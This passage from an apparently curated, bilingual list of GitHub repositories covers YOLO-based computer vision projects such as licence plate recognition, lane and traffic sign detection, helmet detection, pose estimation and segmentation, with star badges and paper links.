ๅŸบไบŽYolo&CNN็š„่ฝฆ็‰Œ่ฏ†ๅˆซๅฏ่ง†ๅŒ–้กน็›ฎใ€‚ - [we0091234/yolov7_plate](https://github.com/we0091234/yolov7_plate) <img src="https://img.shields.io/github/stars/we0091234/yolov7_plate?style=social"/> : yolov7 ่ฝฆ็‰Œๆฃ€ๆต‹ ่ฝฆ็‰Œ่ฏ†ๅˆซ ไธญๆ–‡่ฝฆ็‰Œ่ฏ†ๅˆซ ๆฃ€ๆต‹ ๆ”ฏๆŒๅŒๅฑ‚่ฝฆ็‰Œ ๆ”ฏๆŒ13็งไธญๆ–‡่ฝฆ็‰Œใ€‚ - [MuhammadMoinFaisal/Automatic_Number_Plate_Detection_Recognition_YOLOv8](https://github.com/MuhammadMoinFaisal/Automatic_Number_Plate_Detection_Recognition_YOLOv8) <img src="https://img.shields.io/github/stars/MuhammadMoinFaisal/Automatic_Number_Plate_Detection_Recognition_YOLOv8?style=social"/> : Automatic Number Plate Detection YOLOv8. - #### Lane Detection ##### ่ฝฆ้“็บฟๆฃ€ๆต‹ - [YOLOP](https://github.com/hustvl/YOLOP) <img src="https://img.shields.io/github/stars/hustvl/YOLOP?style=social"/> : "YOLOP: You Only Look Once for Panoptic Driving Perception". (**[arXiv 2021](https://arxiv.org/abs/2108.11250)**). - [YOLOPv2](https://github.com/CAIC-AD/YOLOPv2) <img src="https://img.shields.io/github/stars/CAIC-AD/YOLOPv2?style=social"/> : "YOLOPv2: Better, Faster, Stronger for Panoptic Driving Perception". (**[arXiv 2022](https://arxiv.org/abs/2208.11434)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้›†ๆ™บไนฆ็ซฅใ€ใ€Š[YOLOP v2ๆฅๅ•ฆ | YOLOv7็ป“ๅˆYOLOP็š„ๅคšไปปๅŠก็‰ˆๆœฌ๏ผŒ่ถ…่ถŠYOLOPไปฅๅŠHybridNets](https://mp.weixin.qq.com/s/XTD32JCu_YbZjV2Br3KXCA)ใ€‹" - [FeiGeChuanShu/YOLOPv2-ncnn](https://github.com/FeiGeChuanShu/YOLOPv2-ncnn) <img src="https://img.shields.io/github/stars/FeiGeChuanShu/YOLOPv2-ncnn?style=social"/> : YOLOPv2-ncnn. - [visualbuffer/copilot](https://github.com/visualbuffer/copilot) <img src="https://img.shields.io/github/stars/visualbuffer/copilot?style=social"/> : Lane and obstacle detection for active assistance during driving. - [hpc203/YOLOP-opencv-dnn](https://github.com/hpc203/YOLOP-opencv-dnn) <img src="https://img.shields.io/github/stars/hpc203/YOLOP-opencv-dnn?style=social"/> : ไฝฟ็”จOpenCV้ƒจ็ฝฒๅ…จๆ™ฏ้ฉพ้ฉถๆ„Ÿ็Ÿฅ็ฝ‘็ปœYOLOP๏ผŒๅฏๅŒๆ—ถๅค„็†ไบค้€š็›ฎๆ ‡ๆฃ€ๆต‹ใ€ๅฏ้ฉพ้ฉถๅŒบๅŸŸๅˆ†ๅ‰ฒใ€่ฝฆ้“็บฟๆฃ€ๆต‹๏ผŒไธ‰้กน่ง†่ง‰ๆ„Ÿ็ŸฅไปปๅŠกใ€‚ - [EdVince/YOLOP-NCNN](https://github.com/EdVince/YOLOP-NCNN) <img src="https://img.shields.io/github/stars/EdVince/YOLOP-NCNN?style=social"/> : YOLOP running in Android by ncnn. - #### Driving Behavior Detection ##### ้ฉพ้ฉถ่กŒไธบๆฃ€ๆต‹ - [JingyibySUTsoftware/Yolov5-deepsort-driverDistracted-driving-behavior-detection](https://github.com/JingyibySUTsoftware/Yolov5-deepsort-driverDistracted-driving-behavior-detection) <img src="https://img.shields.io/github/stars/JingyibySUTsoftware/Yolov5-deepsort-driverDistracted-driving-behavior-detection?style=social"/> : ๅŸบไบŽๆทฑๅบฆๅญฆไน ็š„้ฉพ้ฉถๅ‘˜ๅˆ†ๅฟƒ้ฉพ้ฉถ่กŒไธบ๏ผˆ็–ฒๅŠณ+ๅฑ้™ฉ่กŒไธบ๏ผ‰้ข„่ญฆ็ณป็ปŸไฝฟ็”จYOLOv5+Deepsortๅฎž็Žฐ้ฉพ้ฉถๅ‘˜็š„ๅฑ้™ฉ้ฉพ้ฉถ่กŒไธบ็š„้ข„่ญฆ็›‘ๆต‹ใ€‚ - [Arrowes/CEAM-YOLOv7](https://github.com/Arrowes/CEAM-YOLOv7) <img src="https://img.shields.io/github/stars/Arrowes/CEAM-YOLOv7?style=social"/> : "CEAM-YOLOv7:Improved YOLOv7 Based on Channel Expansion and Attention Mechanism for Driver Distraction Behavior Detection". (**[IEEE Access, 2022](https://ieeexplore.ieee.org/abstract/document/9980374/)**). - #### Parking Slot Detection ##### ๅœ่ฝฆไฝๆฃ€ๆต‹ - [visualbuffer/parkingslot](https://github.com/visualbuffer/parkingslot) <img src="https://img.shields.io/github/stars/visualbuffer/parkingslot?style=social"/> : Automated parking occupancy detection. - [anil2k/smart-car-parking-yolov5](https://github.com/anil2k/smart-car-parking-yolov5) <img src="https://img.shields.io/github/stars/anil2k/smart-car-parking-yolov5?style=social"/> : Detect free parking lot available for cars. - #### Traffic Light Detection ##### ไบค้€š็ฏๆฃ€ๆต‹ - [berktepebag/Traffic-light-detection-with-YOLOv3-BOSCH-traffic-light-dataset](https://github.com/berktepebag/Traffic-light-detection-with-YOLOv3-BOSCH-traffic-light-dataset) <img src="https://img.shields.io/github/stars/berktepebag/Traffic-light-detection-with-YOLOv3-BOSCH-traffic-light-dataset?style=social"/> : Detecting Traffic Lights in Real-time with YOLOv3. - [mihir-m-gandhi/Adaptive-Traffic-Signal-Timer](https://github.com/mihir-m-gandhi/Adaptive-Traffic-Signal-Timer) <img src="https://img.shields.io/github/stars/mihir-m-gandhi/Adaptive-Traffic-Signal-Timer?style=social"/> : This Adaptive Traffic Signal Timer uses live images from the cameras at traffic junctions for real-time traffic density calculation using YOLO object detection and sets the signal timers accordingly. - [wade0125/Traffic_Light_Detection_Yolo](https://github.com/wade0125/Traffic_Light_Detection_Yolo) <img src="https://img.shields.io/github/stars/wade0125/Traffic_Light_Detection_Yolo?style=social"/> : Traffic Light Detection Yolo. - #### Traffic Sign Detection ##### ไบค้€šๆ ‡ๅฟ—ๆฃ€ๆต‹ - [Ai-trainee/Traffic-Sign-Recognition-PyQt5-YOLOv5-GUI](https://github.com/Ai-trainee/Traffic-Sign-Recognition-PyQt5-YOLOv5-GUI) <img src="https://img.shields.io/github/stars/Ai-trainee/Traffic-Sign-Recognition-PyQt5-YOLOv5-GUI?style=social"/> : Road Sign Recognition Project Based on YOLOv5. This is a road sign recognition project based on YOLOv5, developed with a PyQt5 interface, YOLOv5 trained model, and MySQL database. ่ฟ™ๆ˜ฏไธ€ไธชๅŸบไบŽYOLOv5๐Ÿš€็š„้“่ทฏๆ ‡ๅฟ—่ฏ†ๅˆซ็ณป็ปŸ๐Ÿ˜Š๏ผŒไฝฟ็”จไบ†MySQLๆ•ฐๆฎๅบ“๐Ÿ’ฝ๏ผŒPyQt5่ฟ›่กŒ็•Œ้ข่ฎพ่ฎก๐ŸŽจ๏ผŒPyTorchๆทฑๅบฆๅญฆไน ๆก†ๆžถๅ’ŒTensorRT่ฟ›่กŒๅŠ ้€Ÿโšก๏ผŒๅŒๆ—ถๅŒ…ๅซไบ†CSSๆ ทๅผ๐ŸŒˆใ€‚็ณป็ปŸ็”ฑไบ”ไธชไธป่ฆๆจกๅ—็ป„ๆˆ๏ผš็ณป็ปŸ็™ปๅฝ•ๆจกๅ—๐Ÿ”‘่ดŸ่ดฃ็”จๆˆท็™ป้™†๏ผ›ๅˆๅง‹ๅŒ–ๅ‚ๆ•ฐๆจกๅ—๐Ÿ“‹ๆไพ›YOLOv5ๆจกๅž‹็š„ๅˆๅง‹ๅŒ–ๅ‚ๆ•ฐ่ฎพ็ฝฎ๏ผ›ๆ ‡ๅฟ—่ฏ†ๅˆซๆจกๅ—๐Ÿ”ๆ˜ฏ็ณป็ปŸ็š„ๆ ธๅฟƒ๏ผŒ่ดŸ่ดฃๅฏน้“่ทฏๆ ‡ๅฟ—่ฟ›่กŒ่ฏ†ๅˆซๅนถๅฐ†็ป“ๆžœๅฏผๅ…ฅๆ•ฐๆฎๅบ“๏ผ›ๆ•ฐๆฎๅบ“ๆจกๅ—๐Ÿ’พๅŒ…ๅซๅŸบๆœฌๆ•ฐๆฎๅบ“ๆ“ไฝœๅ’Œๆ•ฐๆฎๅˆ†ๆžไธคไธชๅญๆจกๅ—๏ผ›ๅ›พๅƒๅค„็†ๆจกๅ—๐Ÿ–ผ๏ธ่ดŸ่ดฃๅ•ไธชๅ›พๅƒ็š„ๅค„็†ๅ’Œๆ•ฐๆฎๅขžๅผบใ€‚ๆ•ดไธช็ณป็ปŸๆ”ฏๆŒๅคš็งๆ•ฐๆฎ่พ“ๅ…ฅๅ’Œๆจกๅž‹ๅˆ‡ๆข๏ผŒๆไพ›ไบ†ๅŒ…ๆ‹ฌmossicๅ’Œmixupๅœจๅ†…็š„ๅ›พๅƒๅขžๅผบๆ–นๆณ•๐Ÿ“ˆใ€‚ - [halftop/TT100K_YOLO_Label](https://github.com/halftop/TT100K_YOLO_Label) <img src="https://img.shields.io/github/stars/halftop/TT100K_YOLO_Label?style=social"/> : Tsinghua-Tencent 100K dataset XML and TXT Label. - [amazingcodeLYL/Traffic_signs_detection_darket](https://github.com/amazingcodeLYL/Traffic_signs_detection_darket) <img src="https://img.shields.io/github/stars/amazingcodeLYL/Traffic_signs_detection_darket?style=social"/> : darknetไบค้€šๆ ‡ๅฟ—ๆฃ€ๆต‹&TT100Kๆ•ฐๆฎ้›†ใ€‚ - [TalkUHulk/yolov3-TT100k](https://github.com/TalkUHulk/yolov3-TT100k) <img src="https://img.shields.io/github/stars/TalkUHulk/yolov3-TT100k?style=social"/> : ไฝฟ็”จyolov3่ฎญ็ปƒ็š„TT100k(ไบค้€šๆ ‡ๅฟ—)ๆจกๅž‹ใ€‚ - [TalkUHulk/yolov4-TT100k](https://github.com/TalkUHulk/yolov4-TT100k) <img src="https://img.shields.io/github/stars/TalkUHulk/yolov4-TT100k?style=social"/> : ไฝฟ็”จyolov4่ฎญ็ปƒ็š„TT100k(ไบค้€šๆ ‡ๅฟ—)ๆจกๅž‹ใ€‚ - [sarah-antillia/YOLO_Realistic_USA_RoadSigns_160classes](https://github.com/sarah-antillia/YOLO_Realistic_USA_RoadSigns_160classes) <img src="https://img.shields.io/github/stars/sarah-antillia/YOLO_Realistic_USA_RoadSigns_160classes?style=social"/> : USA RoadSigns Dataset 160classes annotated by YOLO format. - [DickensKP/yolov3-vehicle-pedestrian-trafficsign-detection-system](https://github.com/DickensKP/yolov3-vehicle-pedestrian-trafficsign-detection-system) <img src="https://img.shields.io/github/stars/DickensKP/yolov3-vehicle-pedestrian-trafficsign-detection-system?style=social"/> : ๅŸบไบŽbubbliiiing็š„yolov3-pytorchๆก†ๆžถ๏ผŒ่‡ชไธป่ฎญ็ปƒ็š„่ฝฆ่พ†ใ€่กŒไบบใ€ไบค้€šๆ ‡ๅฟ—่ฏ†ๅˆซ็ณป็ปŸ. - [mkrupczak3/Coneslayer](https://github.com/mkrupczak3/Coneslayer) <img src="https://img.shields.io/github/stars/mkrupczak3/Coneslayer?style=social"/> : A lightweight neural-network for rapid detection of traffic cones. - #### Crosswalk Detection ##### ไบบ่กŒๆจช้“/ๆ–‘้ฉฌ็บฟๆฃ€ๆต‹ - [CDNet](https://github.com/zhangzhengde0225/CDNet) <img src="https://img.shields.io/github/stars/zhangzhengde0225/CDNet?style=social"/> : "CDNet: a real-time and robust crosswalk detection network on Jetson nano based on YOLOv5". (**[Neural Computing and Applications 2022](https://link.springer.com/article/10.1007/s00521-022-07007-9)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒCVerใ€ใ€Š[ไธŠๆตทไบคๅคงๆๅ‡บCDNet๏ผšๅŸบไบŽๆ”น่ฟ›YOLOv5็š„ๆ–‘้ฉฌ็บฟๅ’Œๆฑฝ่ฝฆ่ฟ‡็บฟ่กŒไธบๆฃ€ๆต‹](https://mp.weixin.qq.com/s/2F3WBtfN_7DkhERMOH8-QA)ใ€‹"ใ€‚ - [xN1ckuz/Crosswalks-Detection-using-YoloV5](https://github.com/xN1ckuz/Crosswalks-Detection-using-YoloV5) <img src="https://img.shields.io/github/stars/xN1ckuz/Crosswalks-Detection-using-YoloV5?style=social"/> : Crosswalks Detection using YOLO, project for Computer Vision and Machine Perception course at University of Basilicata, Computer Science and Engineering. - #### Traffic Accidents Detection ##### ไบค้€šไบ‹ๆ•…ๆฃ€ๆต‹ - [khaledsabry97/Argus](https://github.com/khaledsabry97/Argus) <img src="https://img.shields.io/github/stars/khaledsabry97/Argus?style=social"/> : "Road Traffic Accidents Detection Based On Crash Estimation". (**[IEEE ICENCO 2021](https://ieeexplore.ieee.org/document/9698968)**) - #### Road Damage Detection ##### ้“่ทฏๆŸไผคๆฃ€ๆต‹ - [adnanmushtaq1996/Yolov4_Road_Damage_Detection](https://github.com/adnanmushtaq1996/Yolov4_Road_Damage_Detection) <img src="https://img.shields.io/github/stars/adnanmushtaq1996/Yolov4_Road_Damage_Detection?style=social"/> : A Repository to Train a Custom Yolov4 based object detector for road damage detection using the RDD2020 dataset. - [E-Kozyreva/detection_potholes_yolov8n](https://github.com/E-Kozyreva/detection_potholes_yolov8n) <img src="https://img.shields.io/github/stars/E-Kozyreva/detection_potholes_yolov8n?style=social"/> : ะŸะพะธัะบ ะฒั‹ะฑะพะธะฝ ะฝะฐ ะดะพั€ะพะณะฐั… ั ะธัะฟะพะปัŒะทะพะฒะฐะฝะธะตะผ YOLOv8 Nano. - ### Animal Detection #### ๅŠจ็‰ฉๆฃ€ๆต‹ - [SaiSwarup27/Animal-Intrusion-Detection](https://github.com/SaiSwarup27/Animal-Intrusion-Detection) <img src="https://img.shields.io/github/stars/SaiSwarup27/Animal-Intrusion-Detection?style=social"/> : Animal Detection using YOLOv5. - [xcapt0/animal_recognition](https://github.com/xcapt0/animal_recognition) <img src="https://img.shields.io/github/stars/xcapt0/animal_recognition?style=social"/> : ๐Ÿฆ Let the robot recognize the animal instead of you | YOLOv5. - [PhamDangNguyen/YOLOv5_Animals](https://github.com/PhamDangNguyen/YOLOv5_Animals) <img src="https://img.shields.io/github/stars/PhamDangNguyen/YOLOv5_Animals?style=social"/> : YOLOv5 for detection Animals. - [Sabuj-CSE11/AnimalDetection](https://github.com/Sabuj-CSE11/AnimalDetection) <img src="https://img.shields.io/github/stars/Sabuj-CSE11/AnimalDetection?style=social"/> : Cat and Dogs detection using YoloV5. - ### Helmet Detection #### ๅคด็›”/ๅฎ‰ๅ…จๅธฝๆฃ€ๆต‹ - [PeterH0323/Smart_Construction](https://github.com/PeterH0323/Smart_Construction) <img src="https://img.shields.io/github/stars/PeterH0323/Smart_Construction?style=social"/> : Head Person Helmet Detection on Construction Sites๏ผŒๅŸบไบŽ็›ฎๆ ‡ๆฃ€ๆต‹ๅทฅๅœฐๅฎ‰ๅ…จๅธฝๅ’Œ็ฆๅ…ฅๅฑ้™ฉๅŒบๅŸŸ่ฏ†ๅˆซ็ณป็ปŸใ€‚ - [Byronnar/tensorflow-serving-yolov3](https://github.com/Byronnar/tensorflow-serving-yolov3) <img src="https://img.shields.io/github/stars/Byronnar/tensorflow-serving-yolov3?style=social"/> : ๅฏนๅŽŸtensorflow-yolov3็‰ˆๆœฌๅšไบ†่ฎธๅคš็ป†่Š‚ไธŠ็š„ๆ”น่ฟ›๏ผŒๅขžๅŠ ไบ†TensorFlow-Servingๅทฅ็จ‹้ƒจ็ฝฒ๏ผŒ่ฎญ็ปƒไบ†ๅคšไธชๆ•ฐๆฎ้›†๏ผŒๅŒ…ๆ‹ฌVisdrone2019, ๅฎ‰ๅ…จๅธฝ็ญ‰ใ€‚ - [gengyanlei/reflective-clothes-detect-yolov5](https://github.com/gengyanlei/reflective-clothes-detect-yolov5) <img src="https://img.shields.io/github/stars/gengyanlei/reflective-clothes-detect-yolov5?style=social"/> : reflective-clothes-detect-datasetใ€helemet detection yolov5ใ€ๅทฅไฝœๆœ(ๅๅ…‰่กฃ)ๆฃ€ๆต‹ๆ•ฐๆฎ้›†ใ€ๅฎ‰ๅ…จๅธฝๆฃ€ๆต‹ใ€ๆ–ฝๅทฅไบบๅ‘˜็ฉฟๆˆดๆฃ€ๆต‹ใ€‚ - [DataXujing/YOLO-V3-Tensorflow](https://github.com/DataXujing/YOLO-V3-Tensorflow) <img src="https://img.shields.io/github/stars/DataXujing/YOLO-V3-Tensorflow?style=social"/> : ๐Ÿ‘ท ๐Ÿ‘ท๐Ÿ‘ท YOLO V3(Tensorflow 1.x) ๅฎ‰ๅ…จๅธฝ ่ฏ†ๅˆซ | ๆไพ›ๆ•ฐๆฎ้›†ไธ‹่ฝฝๅ’ŒไธŽ้ข„่ฎญ็ปƒๆจกๅž‹ใ€‚ - [rafiuddinkhan/Yolo-Training-GoogleColab](https://github.com/rafiuddinkhan/Yolo-Training-GoogleColab) <img src="https://img.shields.io/github/stars/rafiuddinkhan/Yolo-Training-GoogleColab?style=social"/> : Helmet Detection using tiny-yolo-v3 by training using your own dataset and testing the results in the google colaboratory. - [BlcaKHat/yolov3-Helmet-Detection](https://github.com/BlcaKHat/yolov3-Helmet-Detection) <img src="https://img.shields.io/github/stars/BlcaKHat/yolov3-Helmet-Detection?style=social"/> : Training a YOLOv3 model to detect the presence of helmet for intrusion or traffic monitoring. - [yumulinfeng1/YOLOv4-Hat-detection](https://github.com/yumulinfeng1/YOLOv4-Hat-detection) <img src="https://img.shields.io/github/stars/yumulinfeng1/YOLOv4-Hat-detection?style=social"/> : ๅŸบไบŽYOLOv4็š„ๅฎ‰ๅ…จๅธฝไฝฉๆˆดๆฃ€ๆต‹ใ€‚ - [FanDady/Helmet-Detection-YoloV5](https://github.com/FanDady/Helmet-Detection-YoloV5) <img src="https://img.shields.io/github/stars/FanDady/Helmet-Detection-YoloV5?style=social"/> : Safety helmet wearing detection on construction site based on YoloV5s-V5.0 including helmet dataset๏ผˆๅŸบไบŽYoloV5-V5.0็š„ๅทฅๅœฐๅฎ‰ๅ…จๅธฝๆฃ€ๆต‹ๅนถไธ”ๅŒ…ๅซๅผ€ๆบ็š„ๅฎ‰ๅ…จๅธฝๆ•ฐๆฎ้›†๏ผ‰ใ€‚ - [RUI-LIU7/Helmet_Detection](https://github.com/RUI-LIU7/Helmet_Detection) <img src="https://img.shields.io/github/stars/RUI-LIU7/Helmet_Detection?style=social"/> : ไฝฟ็”จyolov5็ฎ—ๆณ•ๅฎž็Žฐๅฎ‰ๅ…จๅธฝไปฅๅŠๅฑ้™ฉๅŒบๅŸŸ็š„็›‘ๆต‹๏ผŒๅŒๆ—ถๆŽฅๅ…ฅๆตทๅบทๆ‘„ๅƒๅคดๅฎž็Žฐๅฎžๆ—ถ็›‘ๆต‹ใ€‚ - [ZijianWang1995/PPE_detection](https://github.com/ZijianWang1995/PPE_detection) <img src="https://img.shields.io/github/stars/ZijianWang1995/PPE_detection?style=social"/> : Real-time PPE detection based on YOLO. Open high-quality dataset. "Fast Personal Protective Equipment Detection for Real Construction Sites Using Deep Learning Approaches". (**[Sensors 2021](https://www.mdpi.com/1424-8220/21/10/3478)**) - ### Hand Detection #### ๆ‰‹้ƒจๆฃ€ๆต‹ - [cansik/yolo-hand-detection](https://github.com/cansik/yolo-hand-detection) <img src="https://img.shields.io/github/stars/cansik/yolo-hand-detection?style=social"/> : A pre-trained YOLO based hand detection network. - ### Gesture Recognition #### ๆ‰‹ๅŠฟ/ๆ‰‹่ฏญ่ฏ†ๅˆซ - [MahmudulAlam/Unified-Gesture-and-Fingertip-Detection](https://github.com/MahmudulAlam/Unified-Gesture-and-Fingertip-Detection) <img src="https://img.shields.io/github/stars/MahmudulAlam/Unified-Gesture-and-Fingertip-Detection?style=social"/> : "Unified learning approach for egocentric hand gesture recognition and fingertip detection". (**[Elsevier 2022](https://www.sciencedirect.com/science/article/abs/pii/S0031320321003824)**) - [insigh1/Interactive_ABCs_with_American_Sign_Language_using_Yolov5](https://github.com/insigh1/Interactive_ABCs_with_American_Sign_Language_using_Yolov5) <img src="https://img.shields.io/github/stars/insigh1/Interactive_ABCs_with_American_Sign_Language_using_Yolov5?style=social"/> : Interactive ABC's with American Sign Language. - [Dreaming-future/YOLO-Object-Detection](https://github.com/Dreaming-future/YOLO-Object-Detection) <img src="https://img.shields.io/github/stars/Dreaming-future/YOLO-Object-Detection?style=social"/> : YOLO-Object-Detection ้›†ๆˆๅคš็งyoloๆจกๅž‹๏ผŒไฝœไธบไธ€ไธชๆจกๆฟ่ฟ›่กŒ็›ฎๆ ‡ๆฃ€ๆต‹ใ€‚ - ### Action Detection #### ่กŒไธบๆฃ€ๆต‹ - [wufan-tb/yolo_slowfast](https://github.com/wufan-tb/yolo_slowfast) <img src="https://img.shields.io/github/stars/wufan-tb/yolo_slowfast?style=social"/> : A realtime action detection frame work based on PytorchVideo. - ### Emotion Recognition #### ๆƒ…ๆ„Ÿ่ฏ†ๅˆซ - [Tandon-A/emotic](https://github.com/Tandon-A/emotic) <img src="https://img.shields.io/github/stars/Tandon-A/emotic?style=social"/> : "Context based emotion recognition using emotic dataset". (**[arXiv 2020](https://arxiv.org/abs/2003.13401)**) - ### Human Pose Estimation #### ไบบไฝ“ๅงฟๆ€ไผฐ่ฎก - [wmcnally/kapao](https://github.com/wmcnally/kapao) <img src="https://img.shields.io/github/stars/wmcnally/kapao?style=social"/> : KAPAO is a state-of-the-art single-stage human pose estimation model that detects keypoints and poses as objects and fuses the detections to predict human poses. "Rethinking Keypoint Representations: Modeling Keypoints and Poses as Objects for Multi-Person Human Pose Estimation". (**[arXiv 2021](https://arxiv.org/abs/2111.08557)**) - [TexasInstruments/edgeai-yolov5](https://github.com/TexasInstruments/edgeai-yolov5) <img src="https://img.shields.io/github/stars/TexasInstruments/edgeai-yolov5?style=social"/> : "YOLO-Pose: Enhancing YOLO for Multi Person Pose Estimation Using Object Keypoint Similarity Loss". (**[arXiv 2022](https://arxiv.org/abs/2204.06806)**) - [TexasInstruments/edgeai-yolox](https://github.com/TexasInstruments/edgeai-yolox) <img src="https://img.shields.io/github/stars/TexasInstruments/edgeai-yolox?style=social"/> : "YOLO-Pose: Enhancing YOLO for Multi Person Pose Estimation Using Object Keypoint Similarity Loss". (**[arXiv 2022](https://arxiv.org/abs/2204.06806)**) - [jinfagang/VIBE_yolov5](https://github.com/jinfagang/VIBE_yolov5) <img src="https://img.shields.io/github/stars/jinfagang/VIBE_yolov5?style=social"/> : Using YOLOv5 as detection on VIBE. "VIBE: Video Inference for Human Body Pose and Shape Estimation". (**[CVPR 2020](https://openaccess.thecvf.com/content_CVPR_2020/html/Kocabas_VIBE_Video_Inference_for_Human_Body_Pose_and_Shape_Estimation_CVPR_2020_paper.html)**) - [zhuoxiangpang/ism_person_openpose](https://github.com/zhuoxiangpang/ism_person_openpose) <img src="https://img.shields.io/github/stars/zhuoxiangpang/ism_person_openpose?style=social"/> : yolov5ไบบไฝ“ๆฃ€ๆต‹+openposeๅงฟๆ€ๆฃ€ๆต‹ ๅฎž็Žฐๆ‘”ๅ€’ๆฃ€ๆต‹ใ€‚ - [pengyang1225/yolov5_person_pose](https://github.com/pengyang1225/yolov5_person_pose) <img src="https://img.shields.io/github/stars/pengyang1225/yolov5_person_pose?style=social"/> : ๅŸบไบŽyolov5็š„personโ€”poseใ€‚ - [hpc203/yolov5_pose_opencv](https://github.com/hpc203/yolov5_pose_opencv) <img src="https://img.shields.io/github/stars/hpc203/yolov5_pose_opencv?style=social"/> : ไฝฟ็”จOpenCV้ƒจ็ฝฒyolov5-pose็›ฎๆ ‡ๆฃ€ๆต‹+ไบบไฝ“ๅงฟๆ€ไผฐ่ฎก๏ผŒๅŒ…ๅซC++ๅ’ŒPythonไธคไธช็‰ˆๆœฌ็š„็จ‹ๅบใ€‚ๆ”ฏๆŒyolov5s๏ผŒyolov5m๏ผŒyolov5lใ€‚ - [RizwanMunawar/yolov7-pose-estimation](https://github.com/RizwanMunawar/yolov7-pose-estimation) <img src="https://img.shields.io/github/stars/RizwanMunawar/yolov7-pose-estimation?style=social"/> : YOLOv7 Pose estimation using OpenCV, PyTorch. - [nanmi/yolov7-pose](https://github.com/nanmi/yolov7-pose) <img src="https://img.shields.io/github/stars/nanmi/yolov7-pose?style=social"/> : pose detection base on yolov7. - ### Distance Measurement #### ่ท็ฆปๆต‹้‡ - [davidfrz/yolov5_distance_count](https://github.com/davidfrz/yolov5_distance_count) <img src="https://img.shields.io/github/stars/davidfrz/yolov5_distance_count?style=social"/> : ้€š่ฟ‡yolov5ๅฎž็Žฐ็›ฎๆ ‡ๆฃ€ๆต‹+ๅŒ็›ฎๆ‘„ๅƒๅคดๅฎž็Žฐ่ท็ฆปๆต‹้‡ใ€‚ - [wenyishengkingkong/realsense-D455-YOLOV5](https://github.com/wenyishengkingkong/realsense-D455-YOLOV5) <img src="https://img.shields.io/github/stars/wenyishengkingkong/realsense-D455-YOLOV5?style=social"/> : ๅˆฉ็”จrealsenseๆทฑๅบฆ็›ธๆœบๅฎž็Žฐyolov5็›ฎๆ ‡ๆฃ€ๆต‹็š„ๅŒๆ—ถๆต‹ๅ‡บ่ท็ฆปใ€‚ - [Thinkin99/yolov5_d435i_detection](https://github.com/Thinkin99/yolov5_d435i_detection) <img src="https://img.shields.io/github/stars/Thinkin99/yolov5_d435i_detection?style=social"/> : ไฝฟ็”จrealsense d435i็›ธๆœบ๏ผŒๅŸบไบŽpytorchๅฎž็Žฐyolov5็›ฎๆ ‡ๆฃ€ๆต‹๏ผŒ่ฟ”ๅ›žๆฃ€ๆต‹็›ฎๆ ‡็›ธๆœบๅๆ ‡็ณปไธ‹็š„ไฝ็ฝฎไฟกๆฏใ€‚ - [MUCHWAY/detect_distance_gazebo](https://github.com/MUCHWAY/detect_distance_gazebo) <img src="https://img.shields.io/github/stars/MUCHWAY/detect_distance_gazebo?style=social"/> : yolov5+camera_distance+gazebo. - [magisystem0408/yolov5-DeepSort-RealSenseD435i](https://github.com/magisystem0408/yolov5-DeepSort-RealSenseD435i) <img src="https://img.shields.io/github/stars/magisystem0408/yolov5-DeepSort-RealSenseD435i?style=social"/> : yolov5+Realsence+DeepSense D435i. - ### Instance and Semantic Segmentation #### ๅฎžไพ‹ๅ’Œ่ฏญไน‰ๅˆ†ๅ‰ฒ - [SAM](https://github.com/facebookresearch/segment-anything) <img src="https://img.shields.io/github/stars/facebookresearch/segment-anything?style=social"/> : The repository provides code for running inference with the SegmentAnything Model (SAM), links for downloading the trained model checkpoints, and example notebooks that show how to use the model. "Segment Anything". (**[arXiv 2023](https://arxiv.org/abs/2304.02643)**). - [Grounded-SAM](https://github.com/IDEA-Research/Grounded-Segment-Anything) <img src="https://img.shields.io/github/stars/IDEA-Research/Grounded-Segment-Anything?style=social"/> : Marrying Grounding DINO with Segment Anything & Stable Diffusion & Tag2Text & BLIP & Whisper & ChatBot - Automatically Detect , Segment and Generate Anything with Image, Text, and Audio Inputs. We plan to create a very interesting demo by combining [Grounding DINO](https://github.com/IDEA-Research/GroundingDINO) and [Segment Anything](https://github.com/facebookresearch/segment-anything) which aims to detect and segment Anything with text inputs! - [Laughing-q/yolov5-q](https://github.com/Laughing-q/yolov5-q) <img src="https://img.shields.io/github/stars/Laughing-q/yolov5-q?style=social"/> : This repo is plan for instance segmentation based on yolov5-6.0 and yolact. - [TomMao23/multiyolov5](https://github.com/TomMao23/multiyolov5) <img src="https://img.shields.io/github/stars/TomMao23/multiyolov5?style=social"/> : Multi YOLO V5โ€”โ€”Detection and Semantic Segmentation. - [ArtyZe/yolo_segmentation](https://github.com/ArtyZe/yolo_segmentation) <img src="https://img.shields.io/github/stars/ArtyZe/yolo_segmentation?style=social"/> : image (semantic segmentation) instance segmentation by darknet or yolo. - [midasklr/yolov5ds](https://github.com/midasklr/yolov5ds) <img src="https://img.shields.io/github/stars/midasklr/yolov5ds?style=social"/> : multi-task yolov5 with detection and segmentation. - [RizwanMunawar/yolov7-segmentation](https://github.com/RizwanMunawar/yolov7-segmentation) <img src="https://img.shields.io/github/stars/RizwanMunawar/yolov7-segmentation?style=social"/> : YOLOv7 Instance Segmentation using OpenCV and PyTorch. - [leandro-svg/Yolov7_Segmentation_Tensorrt](https://github.com/leandro-svg/Yolov7_Segmentation_Tensorrt) <img src="https://img.shields.io/github/stars/leandro-svg/Yolov7_Segmentation_Tensorrt?style=social"/> : The real-time Instance Segmentation Algorithm Yolov7 running on TensoRT and ONNX. - [akashAD98/YOLOV8_SAM](https://github.com/akashAD98/YOLOV8_SAM) <img src="https://img.shields.io/github/stars/akashAD98/YOLOV8_SAM?style=social"/> : Use yolov8 & SAM model to get segmention for custom model. - ### 3D Object Detection #### ไธ‰็ปด็›ฎๆ ‡ๆฃ€ๆต‹ - [ADLab-AutoDrive/BEVFusion](https://github.com/ADLab-AutoDrive/BEVFusion) <img src="https://img.shields.io/github/stars/ADLab-AutoDrive/BEVFusion?style=social"/> : "BEVFusion: A Simple and Robust LiDAR-Camera Fusion Framework". (**[NeurIPS 2022](https://arxiv.org/abs/2205.13790)**). - [mit-han-lab/bevfusion](https://github.com/mit-han-lab/bevfusion) <img src="https://img.shields.io/github/stars/mit-han-lab/bevfusion?style=social"/> : "BEVFusion: Multi-Task Multi-Sensor Fusion with Unified Bird's-Eye View Representation". (**[ICRA 2023](https://arxiv.org/abs/2205.13542)**). - [SAM3D](https://github.com/DYZhang09/SAM3D) <img src="https://img.shields.io/github/stars/DYZhang09/SAM3D?style=social"/> : "SAM3D: Zero-Shot 3D Object Detection via [Segment Anything](https://github.com/facebookresearch/segment-anything) Model". (**[arXiv 